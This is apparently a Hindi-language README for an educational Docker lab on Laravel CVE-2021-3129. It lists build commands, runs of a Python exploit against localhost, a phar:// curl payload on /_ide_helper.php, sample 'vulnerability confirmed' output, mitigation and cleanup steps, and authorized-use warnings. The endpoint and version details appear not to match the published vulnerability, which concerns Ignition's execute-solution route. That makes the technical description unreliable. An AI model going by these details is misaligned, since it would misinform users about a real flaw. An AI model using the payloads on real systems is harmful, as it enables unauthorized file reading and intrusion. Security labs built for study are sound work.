
CVE-2021-3129: Laravel डीबग मोड RCE - Python एक्सप्लॉइट, Docker कंटेनर और सुरक्षा विश्लेषण गाइड के साथ संपूर्ण शोषण प्रयोगशाला।
CVE-2021-3129 के शोषण के लिए व्यावहारिक लैब - एक गंभीर Laravel भेद्यता जो बिना प्रमाणीकरण के फ़ाइल पठन और संभावित RCE की अनुमति देती है।
# Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab
# Build & Run
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest
# Test
curl http://localhost:8080/_ide_helper.php
# Exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
/_ide_helper.php एंडपॉइंट का परीक्षण करेंphar:// रैपर का उपयोग करें# 1. Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab
# 2. Build container
docker build -t cve-2021-3129-lab:latest .
# 3. Run container
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest
# 4. Verify endpoint
curl http://localhost:8080/_ide_helper.php
# 5. Run exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
[✓✓✓] CVE-2021-3129 VULNERABILITY CONFIRMED!
VULNERABILITY DETAILS:
- Debug mode is ENABLED (APP_DEBUG=true)
- _ide_helper.php is ACCESSIBLE
- Arbitrary file read is POSSIBLE
- Sensitive information LEAKED
# Basic
python3 cve_2021_3129_exploit.py http://localhost:8080
# Custom timeout
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10
# Help
python3 cve_2021_3129_exploit.py -h
# Test endpoint
curl http://localhost:8080/_ide_helper.php
# Test with payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'
# 1. Set APP_DEBUG=false in .env
# 2. Remove _ide_helper.php
# 3. Update Laravel to patched version (8.4.2+, 7.30.4+)
# 4. Restart application
# Stop container
docker stop laravel-cve-2021-3129
# Remove container
docker rm laravel-cve-2021-3129
# Remove image
docker rmi cve-2021-3129-lab:latest
प्र: क्या मैं इंटरनेट पर परीक्षण कर सकता हूँ?
उ: नहीं। यह केवल localhost के लिए है। कभी भी उन सिस्टम पर परीक्षण न करें जिनके मालिक आप नहीं हैं।
प्र: क्या यह पैच किए गए संस्करणों पर काम करेगा?
उ: नहीं। Laravel 8.4.2+ और 7.30.4+ पैच किए जा चुके हैं।
प्र: क्या मैं एक्सप्लॉइट को संशोधित कर सकता हूँ?
उ: हाँ। सीखने के उद्देश्य से कोड पूरी तरह टिप्पणीयुक्त है।
प्र: नेटवर्क ट्रैफ़िक कैसे कैप्चर करें?
उ: tcpdump या Wireshark का उपयोग करें:
sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# In another terminal, run the exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Open capture: wireshark capture.pcapng
⚠️ केवल शैक्षिक उद्देश्यों के लिए
✅ अधिकृत उपयोग:
❌ निषिद्ध उपयोग:
केवल उन्हीं सिस्टम पर उपयोग करें जिनके मालिक आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।
Naresh R (@theNareshofficial)
MIT लाइसेंस - LICENSE फ़ाइल देखें
| विशेषता | विवरण |
|---|
| गंभीरता | CVSS 7.5 (उच्च) |
| प्रभावित | Laravel < 8.4.2, < 7.30.4 |
| प्रभाव | मनमानी फ़ाइल पठन, जानकारी का रिसाव, संभावित RCE |
| प्रमाणीकरण आवश्यक | नहीं |
| हमला वेक्टर | नेटवर्क |